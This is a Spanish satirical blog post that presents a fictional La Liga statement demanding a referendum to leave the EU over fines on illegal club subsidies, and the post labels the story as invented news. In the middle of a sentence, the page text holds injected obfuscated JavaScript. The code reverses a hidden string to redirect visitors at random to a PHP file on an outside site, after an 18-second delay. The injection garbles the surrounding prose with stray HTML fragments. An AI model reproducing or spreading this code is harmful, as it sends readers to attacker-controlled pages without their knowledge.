[NIon] La Liga promueve un referéndum para dejar la UE

La Liga de Fútbol Profesional, inspirándose el ejemplo británico, se ha dirigido a los partidos representados en el nuevo parlamento, solicitando que, como primer acuerdo de la legislatura y con carácter de emergencia, se convoque un referéndum para abandonar la Unión Europea.

FEXIT-2

El comunicado, redactado en un estilo muy directo y poco protocolario siguiendo los nuevos tiempos de la vida política, dice:

¿Qué se han creído estos señores de Europa? Lo del toro de La Vega, vale. Lo del derecho a la vivienda, pase. Con lo de que $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-sostenibilidad-y-energia/” target=”_blank”>eficiencia energética fue ridículo, como ellos viven en países fríos, piensan que todos somos iguales. La accesibilidad universal…

tomeu” width=”700″ height=”467″ />

Pero que nos toquen el fútbol NO LO VAMOS A CONSENTIR. Las subvenciones publicas a quienes, como nosotros, desarrollamos una actividad de interés general, forman parte de la idiosincrasia de nuestros pueblos. ¡Ni Franco se atrevió con el fútbol!

Nos quieren multar porque tienen envidia de nuestra liga, porque nos tienen manía porque ganamos todas las copas y eurocopas, porque lo copamos todo.

Si se quieren meter hasta con el ATHLETIC CAMPEON!!! Y el Osasuna! ¡Qué sádicos!

Además, ¿qué es eso de que nos financiamos con rectificaciones y convenios urbanísticos? No saben de lo que hablan. Sencillamente todo es falso y, además, lo hacen todos.

A grandes males… soluciones directas: Hagamos como Cameron, mira ahora que bien le tratan.

Concluyen recordando a los partidos políticos que el fútbol es el deporte rey y que los aficionados verían con malos ojos a aquellos grupos que no secunden su iniciativa.

¿La noticia es falsa o verdadera? Pulsa aquí para ver la respuesta

La noticia es FALSA.

Por ahora.

¿Qué harán ante noticias como esta: Bruselas exige a siete clubes de fútbol españoles devolver hasta casi 69 millones en ayudas ilegales?

83909_300x190

Todas las NOTICIAS INVENTADAS (¿o no?)

The following two tabs change content below.

Natxo Tejerina

Licenciado en Derecho (Deusto, 1979). Abogado (Bilbao, 1980-1991), Profesor en los cursos de urbanismo del IVAP (1995-2020). Funcionario en diversos ayuntamientos desde 1991, actualmente en Urbanismo del Ayuntamiento de Barakaldo en periodo sabático.

Leave a Reply

Your email address will not be published.